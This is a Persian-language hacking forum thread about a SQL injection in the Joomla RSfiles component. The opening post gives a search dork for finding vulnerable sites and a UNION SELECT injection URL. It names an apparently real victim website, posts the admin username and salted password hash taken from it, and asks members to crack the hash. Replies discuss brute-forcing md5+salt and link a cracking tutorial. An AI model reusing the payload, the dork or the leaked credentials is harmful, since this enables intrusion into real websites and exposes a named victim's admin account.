SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Joomla Component RSfiles SQL injection Vulnerability

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Joomla Component RSfiles SQL injection Vulnerability

    سلام خدمت دوستان این باگ باگ جالبی هست و کار هم میده !!
    [php]

    ************************************************** *****************************
    # Title : Joomla Component RSfiles <= (cid) SQL injection Vulnerability
    # Author : ByEge
    # Contact : http://byege.blogspot.com
    # Date : 18.03.2013
    # S.Page : http://www.rsjoomla.com
    # Dork : inurl:index.php?option=com_rsfiles

    Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tm pl=component&cid=1())--

    [[SQL Injection Test]]]

    http://server/?option=com_rsfiles&view=files&layout=agreement&tm pl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),da tabase(),version())--
    [/php]

    دوستان یک نمونه سایت براتون میزارم که user pass رو بدست اوردم البته پسورد هش هست که دوستان زحمت بکشن هش رو کرک کنند روش کرک و خود پس رو همین جا بزارن .
    [php]
    http://www.rolt.co.uk//index.php?option=com_rsfiles&view=files&layout=agr eement&tmpl=component&cid=1
    user:admin
    pass:cb2fbb76b10fa3617543a02e58b69959:BMkfeTKYzUAG nTb3M0bJrYF2iSOohLqH
    [/php]

    ببخشید دسترسی برای ایجاد موضوع تو بخش مربوطه رو نداشتم !
    [align=center]iRaNHaCk SeCuRitY TeAm

    [/align]


  • #2
    RE: Joomla Component RSfiles SQL injection Vulnerability

    ﺑﻴﺎ ﺍﻣﻮﺯﺵ ﻛﺮﻙ ﻛﺮﺩﻥ ﺗﻮ ﺍﻧﺠﻤﻦ ﮔﺬﺍﺷﺘﻢ ﺍﻳﻨﻢ ﻟﻴﻨﻚ ﺍﺵ ﻫﺴﺖ
    http://www.iranhack.com/acc/thread-1154.html


    ﺍﮔﻪ ﺳﺮﭺ ﻛﻨﻲ ﺩﺭ ﺳﺎﻳﺖ ﻫﺴﺖ

    نظر


    • #3
      RE: Joomla Component RSfiles SQL injection Vulnerability

      چشم عزیزم !! اما این نوع هش مقداری فرق میکنه بهتره اول یک مقدار اطلاعات خودتونو در این رابطه زیاد کنید (با سوال و جواب و کمی تحقیق) بعد پست بدید ! تمام سایت های در اون تاپیک فوقش پسورد های md5 رو کرک کنن اما md5+salt
      قضیش فرق میکنه !! باید بروت فرس بشه یا روش های دیگه ای که ....
      بهرحال ممنون .
      [align=center]iRaNHaCk SeCuRitY TeAm

      [/align]

      نظر


      • #4
        RE: Joomla Component RSfiles SQL injection Vulnerability

        کار نداد برای من جدیدا هرچی باگ میاد بیرون هرکدوم رو من تست میکنم رو سایت های جومیلا هیچ کدوم کار نمیکنن نمیدونم چرا؟؟؟

        نظر


        • #5
          RE: Joomla Component RSfiles SQL injection Vulnerability

          الان این باگ براتون کار نمیده یعنی ؟؟ یا اینکه نمیتونید از باگ هایی که برای جوملا ریپورت میشه استفاده کنید ؟
          [align=center]iRaNHaCk SeCuRitY TeAm

          [/align]

          نظر

          صبر کنید ..
          X